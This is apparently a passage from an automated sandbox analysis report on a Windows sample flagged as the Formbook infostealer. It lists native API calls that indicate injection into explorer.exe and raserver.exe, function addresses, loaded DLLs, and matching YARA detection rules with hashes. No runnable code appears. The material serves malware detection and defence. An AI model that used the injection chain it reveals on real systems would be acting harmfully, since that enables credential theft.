              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412CC0 NtQueryVirtualMemory,3_2_04412CC0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412CF0 NtOpenProcess,3_2_04412CF0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412D00 NtSetInformationFile,3_2_04412D00
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412D30 NtUnmapViewOfSection,3_2_04412D30
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412DB0 NtEnumerateKey,3_2_04412DB0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412E30 NtWriteVirtualMemory,3_2_04412E30
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412EE0 NtQueueApcThread,3_2_04412EE0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412E80 NtReadVirtualMemory,3_2_04412E80
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412F60 NtCreateProcessEx,3_2_04412F60
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412F90 NtProtectVirtualMemory,3_2_04412F90
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412FA0 NtQuerySection,3_2_04412FA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412FB0 NtResumeThread,3_2_04412FB0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412AF0 NtWriteFile,3_2_04412AF0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412AB0 NtWaitForSingleObject,3_2_04412AB0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412B80 NtQueryInformationFile,3_2_04412B80
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04412BA0 NtEnumerateValueKey,3_2_04412BA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04413010 NtOpenDirectoryObject,3_2_04413010
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04413090 NtSetValueKey,3_2_04413090
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04413D70 NtOpenThread,3_2_04413D70
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04413D10 NtOpenProcessToken,3_2_04413D10
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044139B0 NtGetContextThread,3_2_044139B0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA350 NtCreateFile,3_2_004DA350
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA400 NtReadFile,3_2_004DA400
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA480 NtClose,3_2_004DA480
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA530 NtAllocateVirtualMemory,3_2_004DA530
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA47C NtClose,3_2_004DA47C
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DA52C NtAllocateVirtualMemory,3_2_004DA52C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009710300_2_00971030
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097102C0_2_0097102C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098DB2A0_2_0098DB2A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00972D900_2_00972D90
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D5960_2_0098D596
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00972D870_2_00972D87
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098DE5E0_2_0098DE5E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979E500_2_00979E50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979E4B0_2_00979E4B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00972FB00_2_00972FB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098E7A00_2_0098E7A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016481580_2_01648158
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B01000_2_015B0100
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A1180_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016781CC0_2_016781CC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016801AA0_2_016801AA
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016741A20_2_016741A2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016520000_2_01652000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167A3520_2_0167A352
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016803E60_2_016803E6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CE3F00_2_015CE3F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016602740_2_01660274
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016402C00_2_016402C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C05350_2_015C0535
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016805910_2_01680591
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016724460_2_01672446
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016644200_2_01664420
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166E4F60_2_0166E4F6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E47500_2_015E4750
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C07700_2_015C0770
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BC7C00_2_015BC7C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DC6E00_2_015DC6E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D69620_2_015D6962
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0168A9A60_2_0168A9A6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A00_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CA8400_2_015CA840
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C28400_2_015C2840
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EE8F00_2_015EE8F0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A68B80_2_015A68B8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167AB400_2_0167AB40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01676BD70_2_01676BD7
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA800_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CAD000_2_015CAD00
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165CD1F0_2_0165CD1F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BADE00_2_015BADE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D8DBF0_2_015D8DBF
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0C000_2_015C0C00
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0CF20_2_015B0CF2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01660CB50_2_01660CB5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01634F400_2_01634F40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01602F280_2_01602F28
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01662F300_2_01662F30
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E0F300_2_015E0F30
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B2FC80_2_015B2FC8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CCFE00_2_015CCFE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163EFA00_2_0163EFA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0E590_2_015C0E59
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167EE260_2_0167EE26
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167EEDB0_2_0167EEDB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2E900_2_015D2E90
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167CE930_2_0167CE93
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0168B16B0_2_0168B16B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AF1720_2_015AF172
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015F516C0_2_015F516C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015CB1B00_2_015CB1B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167F0E00_2_0167F0E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016770E90_2_016770E9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C70C00_2_015C70C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166F0CC0_2_0166F0CC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AD34C0_2_015AD34C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167132D0_2_0167132D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0160739A0_2_0160739A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016612ED0_2_016612ED
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DB2C00_2_015DB2C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C52A00_2_015C52A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016775710_2_01677571
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165D5B00_2_0165D5B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B14600_2_015B1460
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167F43F0_2_0167F43F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167F7B00_2_0167F7B0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016056300_2_01605630
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016716CC0_2_016716CC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C99500_2_015C9950
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DB9500_2_015DB950
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016559100_2_01655910
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162D8000_2_0162D800
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C38E00_2_015C38E0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167FB760_2_0167FB76
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01635BF00_2_01635BF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015FDBF90_2_015FDBF9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DFB800_2_015DFB80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01633A6C0_2_01633A6C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01677A460_2_01677A46
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167FA490_2_0167FA49
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0166DAC60_2_0166DAC6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01605AA00_2_01605AA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01661AA30_2_01661AA3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165DAAC0_2_0165DAAC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01677D730_2_01677D73
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C3D400_2_015C3D40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01671D5A0_2_01671D5A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DFDC00_2_015DFDC0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01639C320_2_01639C32
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167FCF20_2_0167FCF2
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167FF090_2_0167FF09
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C1F920_2_015C1F92
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167FFB10_2_0167FFB1
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C9EB00_2_015C9EB0
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7C2322_2_0DF7C232
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7F5CD2_2_0DF7F5CD
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF76B322_2_0DF76B32
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF76B302_2_0DF76B30
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF799122_2_0DF79912
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF73D022_2_0DF73D02
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF720822_2_0DF72082
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7B0362_2_0DF7B036
              Source: C:\Windows\explorer.exeCode function: 2_2_1011B0362_2_1011B036
              Source: C:\Windows\explorer.exeCode function: 2_2_101120822_2_10112082
              Source: C:\Windows\explorer.exeCode function: 2_2_101199122_2_10119912
              Source: C:\Windows\explorer.exeCode function: 2_2_10113D022_2_10113D02
              Source: C:\Windows\explorer.exeCode function: 2_2_1011F5CD2_2_1011F5CD
              Source: C:\Windows\explorer.exeCode function: 2_2_1011C2322_2_1011C232
              Source: C:\Windows\explorer.exeCode function: 2_2_10116B302_2_10116B30
              Source: C:\Windows\explorer.exeCode function: 2_2_10116B322_2_10116B32
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044924463_2_04492446
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044844203_2_04484420
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0448E4F63_2_0448E4F6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E05353_2_043E0535
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044A05913_2_044A0591
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043FC6E03_2_043FC6E0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044047503_2_04404750
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E07703_2_043E0770
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043DC7C03_2_043DC7C0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044720003_2_04472000
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044681583_2_04468158
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D01003_2_043D0100
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0447A1183_2_0447A118
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044981CC3_2_044981CC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044A01AA3_2_044A01AA
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044941A23_2_044941A2
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044802743_2_04480274
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044602C03_2_044602C0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449A3523_2_0449A352
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044A03E63_2_044A03E6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043EE3F03_2_043EE3F0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E0C003_2_043E0C00
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D0CF23_2_043D0CF2
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04480CB53_2_04480CB5
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043EAD003_2_043EAD00
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0447CD1F3_2_0447CD1F
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043F8DBF3_2_043F8DBF
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043DADE03_2_043DADE0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E0E593_2_043E0E59
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449EE263_2_0449EE26
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449EEDB3_2_0449EEDB
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043F2E903_2_043F2E90
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449CE933_2_0449CE93
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04454F403_2_04454F40
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04422F283_2_04422F28
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04400F303_2_04400F30
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04482F303_2_04482F30
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043ECFE03_2_043ECFE0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0445EFA03_2_0445EFA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D2FC83_2_043D2FC8
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043EA8403_2_043EA840
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E28403_2_043E2840
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043C68B83_2_043C68B8
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0440E8F03_2_0440E8F0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043F69623_2_043F6962
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E29A03_2_043E29A0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044AA9A63_2_044AA9A6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043DEA803_2_043DEA80
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449AB403_2_0449AB40
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04496BD73_2_04496BD7
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D14603_2_043D1460
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449F43F3_2_0449F43F
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044975713_2_04497571
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044A95C33_2_044A95C3
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0447D5B03_2_0447D5B0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044256303_2_04425630
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044916CC3_2_044916CC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449F7B03_2_0449F7B0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0448F0CC3_2_0448F0CC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044970E93_2_044970E9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449F0E03_2_0449F0E0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E70C03_2_043E70C0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044AB16B3_2_044AB16B
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0441516C3_2_0441516C
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043CF1723_2_043CF172
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043EB1B03_2_043EB1B0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E52A03_2_043E52A0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044812ED3_2_044812ED
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043FB2C03_2_043FB2C0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449132D3_2_0449132D
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043CD34C3_2_043CD34C
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0442739A3_2_0442739A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04459C323_2_04459C32
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449FCF23_2_0449FCF2
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04491D5A3_2_04491D5A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04497D733_2_04497D73
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E3D403_2_043E3D40
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043FFDC03_2_043FFDC0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E9EB03_2_043E9EB0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449FF093_2_0449FF09
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E1F923_2_043E1F92
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A3FD23_2_043A3FD2
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A3FD53_2_043A3FD5
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449FFB13_2_0449FFB1
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0444D8003_2_0444D800
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E38E03_2_043E38E0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_044759103_2_04475910
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043E99503_2_043E9950
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043FB9503_2_043FB950
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449FA493_2_0449FA49
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04497A463_2_04497A46
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04453A6C3_2_04453A6C
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0448DAC63_2_0448DAC6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04425AA03_2_04425AA0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0447DAAC3_2_0447DAAC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04481AA33_2_04481AA3
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0449FB763_2_0449FB76
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_04455BF03_2_04455BF0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_0441DBF93_2_0441DBF9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043FFB803_2_043FFB80
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DE7A03_2_004DE7A0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004C2D873_2_004C2D87
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004C2D903_2_004C2D90
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004C2FB03_2_004C2FB0
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DD5963_2_004DD596
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DDB2A3_2_004DDB2A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004C9E4B3_2_004C9E4B
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004C9E503_2_004C9E50
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DDE603_2_004DDE60
              Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0445F290 appears 105 times
              Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 043CB970 appears 280 times
              Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04427E54 appears 111 times
              Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04415130 appears 58 times
              Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0444EA12 appears 86 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: String function: 0163F290 appears 105 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: String function: 01607E54 appears 109 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: String function: 015AB970 appears 280 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: String function: 015F5130 appears 58 times
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: String function: 0162EA12 appears 86 times
              Source: jqPZZhDmjh.exeStatic PE information: No import functions for PE file found
              Source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001939000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2051833702.000000000133A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000002.2119541533.00000000016AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000014FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs jqPZZhDmjh.exe
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dllJump to behavior
              Source: jqPZZhDmjh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
